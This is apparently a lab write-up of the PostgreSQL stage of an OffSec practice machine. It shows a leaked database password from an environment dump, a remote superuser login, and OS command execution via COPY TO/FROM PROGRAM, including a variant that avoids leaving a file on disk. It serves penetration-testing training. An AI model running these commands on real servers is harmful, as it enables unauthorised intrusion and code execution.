PostgreSQL


A PostgreSQL instance has been confirmed to be up and running on the target, listening on port 5432.

bash-4.2$ env
DB_HOST=127.0.0.1
TERM=xterm-256color
DB_PORT=5432
SESSION_DRIVER=file
APP_NAME=Splodge
USER=nginx
BROADCAST_DRIVER=log
APP_URL=http://splodge.offsec
CACHE_DRIVER=file
DB_CONNECTION=pgsql
DB_DATABASE=splodge
PWD=/usr/share/nginx/html
DB_PASSWORD=PolicyWielderCandle120
APP_KEY=base64:F9jFCNy0vJ1GhEsbf+PjmTSSHk8u741C5XNTN1Rguow=
APP_DEBUG=false
HOME=/var/lib/nginx
DB_USERNAME=postgres
SHLVL=2
APP_LOG_LEVEL=info
APP_ENV=local
QUEUE_DRIVER=sync
_=/usr/bin/env
OLDPWD=/usr/share/nginx

PEAS revealed a DB credential hard-coded in the environment variables of the current account, nginx (DB_USERNAME=postgres, DB_PASSWORD=PolicyWielderCandle120, DB_HOST=127.0.0.1). PSPY also revealed that the valid system user thesplodge executes PostgreSQL-related commands, because that account is the one running the instance itself.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/splodge]
└─$ psql -h $IP -p 5432 -U postgres
Password for user postgres: PolicyWielderCandle120
psql (17.4 (Debian 17.4-1), server 12.4)
Type "help" for help.
 
postgres=# SELECT usesuper FROM pg_user WHERE usename='postgres';
 usesuper 
----------
 t
(1 row)
 
postgres=# SELECT usename FROM pg_user WHERE usesuper IS TRUE;
 usename  
----------
 postgres
(1 row)

Connected to the instance remotely using the credential from the environment variable (PolicyWielderCandle120). Although the application connects to DB_HOST=127.0.0.1, the remote login succeeded, so pg_hba.conf accepts password authentication from the attacking host. The server version is 12.4 (17.4 is only the local psql client), and the current user, postgres, is the only superuser on the instance.

postgres=# \l
                                                     List of databases
   Name    |  Owner   | Encoding | Locale Provider |   Collate   |    Ctype    | Locale | ICU Rules |   Access privileges   
-----------+----------+----------+-----------------+-------------+-------------+--------+-----------+-----------------------
 postgres  | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | 
 splodge   | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | 
 template0 | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | =c/postgres          +
           |          |          |                 |             |             |        |           | postgres=CTc/postgres
 template1 | postgres | UTF8     | libc            | en_US.UTF-8 | en_US.UTF-8 |        |           | =c/postgres          +
           |          |          |                 |             |             |        |           | postgres=CTc/postgres
(4 rows)

Besides the default databases (postgres, template0, template1), there is the application's splodge DB, also owned by postgres.

postgres=# COPY (SELECT '') to PROGRAM 'id > /tmp/out.txt';
COPY 1
postgres=# SELECT pg_read_file('/tmp/out.txt', 0, 99999);
                           pg_read_file                            
-------------------------------------------------------------------
 uid=1000(thesplodge) gid=1000(thesplodge) groups=1000(thesplodge)+
 
(1 row)

As expected, the PostgreSQL instance is running with the privileges of the thesplodge user, so COPY ... TO PROGRAM as the postgres superuser yields command execution as that account. Moving on to the Lateral Movement phase.
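As an added example (not part of the original write-up), the same command execution done without leaving /tmp/out.txt on disk: the prerequisite roles are checked first, then COPY ... FROM PROGRAM captures the command's stdout straight into a temporary table instead of going through a file and pg_read_file. It assumes the postgres superuser session on the 12.4 server shown above; the table name cmd_out and the commands run are illustrative choices.

```sql
-- Added example, not the original write-up's commands. Assumes a superuser
-- session (the postgres role above) on PostgreSQL 12; cmd_out is an illustrative name.

-- 1. Confirm the prerequisites. COPY ... TO/FROM PROGRAM needs either superuser
--    or, on PostgreSQL 11+, membership in pg_execute_server_program; pg_read_file
--    likewise needs superuser or pg_read_server_files.
SELECT current_user,
       current_setting('is_superuser')                                     AS is_superuser,
       pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER')     AS can_exec_program,
       pg_has_role(current_user, 'pg_read_server_files', 'MEMBER')          AS can_read_files,
       version();

-- 2. Run the command and capture its stdout (and stderr, via 2>&1) as one row
--    per output line. The default text format treats a tab as the column
--    delimiter, so an unlikely control character is set as the delimiter to keep
--    tab-containing lines from raising "extra data after last expected column".
CREATE TEMP TABLE cmd_out (line text);
COPY cmd_out FROM PROGRAM 'id; hostname; ls -la /home 2>&1' WITH (DELIMITER E'\x01');
SELECT line FROM cmd_out;

-- 3. Nothing is written to the server's filesystem, unlike 'id > /tmp/out.txt'
--    followed by pg_read_file. The TEMP table disappears when the session ends;
--    dropping it explicitly keeps the session tidy.
DROP TABLE cmd_out;
```

The program runs as the operating-system user that owns the postmaster process (thesplodge here), not as the database role, which is why the id output matches the result obtained above. Backslashes in the output are still interpreted as escapes by the text format; for arbitrary binary output, redirecting to a file and using pg_read_binary_file is the safer route.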